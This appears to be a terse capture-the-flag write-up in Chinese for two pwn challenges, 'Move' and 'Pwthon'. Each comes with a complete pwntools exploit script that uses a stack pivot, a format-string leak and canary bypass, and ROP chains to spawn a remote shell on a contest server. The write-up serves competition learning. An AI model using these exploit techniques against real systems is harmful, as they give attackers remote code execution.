Move
栈迁移+ret2libc
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 from pwn import *io = remote('123.56.25.124' , 22278 ) context.binary = 'pwn' libc = ELF('libc.so.6' , checksec = False ) rc = lambda n : io.recv(n) sa = lambda a, b : io.sendafter(a, b) ia = lambda : io.interactive() uu64 = lambda x : u64(x.ljust(8 , b'\x00' )) pop_rdi = 0x0000000000401353 got = 0x0000000000404018 plt = 0x0000000000401080 main = 0x0000000000401264 pld = flat([ pop_rdi, got, plt, main ]) sa('lets travel again!\n' , pld) sa('Input your setp number' , p32(0x12345678 )) pld = flat({ 0x38 -8 : 0x00000000004050A0 - 8 , 0x38 : 0x00000000004012E0 , }) sa('TaiCooLa' , pld) libc_base = uu64(rc(6 )) - libc.sym['puts' ] sys_addr = libc_base + libc.sym['system' ] binsh_addr = libc_base + libc.search('/bin/sh' ).next () pld = flat([ pop_rdi, binsh_addr, sys_addr, main ]) sa('lets travel again!\n' , pld) ia()
Pwthon
格式化字符串+栈溢出
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 from pwn import *io = remote('123.56.9.101' , 26410 ) context.bits = 64 libc = ELF('/lib/x86_64-linux-gnu/libc.so.6' , checksec = False ) ru = lambda x : io.recvuntil(x, drop = True ) sd = lambda x : io.send(x) sl = lambda x : io.sendline(x) sa = lambda a, b : io.sendafter(a, b) sla = lambda a, b : io.sendlineafter(a, b) ia = lambda : io.interactive() def menu (choice ): sla('> ' , str (choice)) menu(0 ) ru('Give you a gift' ) app_base = int (ru('\n' ), 16 ) - (0x7fd4ccdf88b0 - 0x7fd4ccdf2000 ) sd('%llx,' * 0x1a ) sl('' ) data = ru('\n' ) libc_base = int (data[-13 :-1 ], 16 ) - (0x7f54772a6cdd - 0x7f5477197000 ) sys_addr = libc_base + libc.sym['system' ] binsh_addr = libc_base + libc.search('/bin/sh' ).next () menu(0 ) ru('Give you a gift' ) data = ru('\n' ) sd('%lx,' * 50 ) sl('' ) data = ru('>' ) canary = int (data[-19 :-3 ], 16 ) pop_rdi = app_base + 0x0000000000003f8f ret = app_base + 0x000000000000301a sl('0' ) ru('Give you a gift' ) sd('a' ) pld = flat({ 0x108 : canary, 0x110 : ret, 0x118 : ret, 0x120 : ret, 0x128 : ret, 0x130 : pop_rdi, 0x138 : binsh_addr, 0x140 : sys_addr, }) sd(pld) ia()
一开始脑抽一直想着把cpython的so文件还原成python代码(一血又没了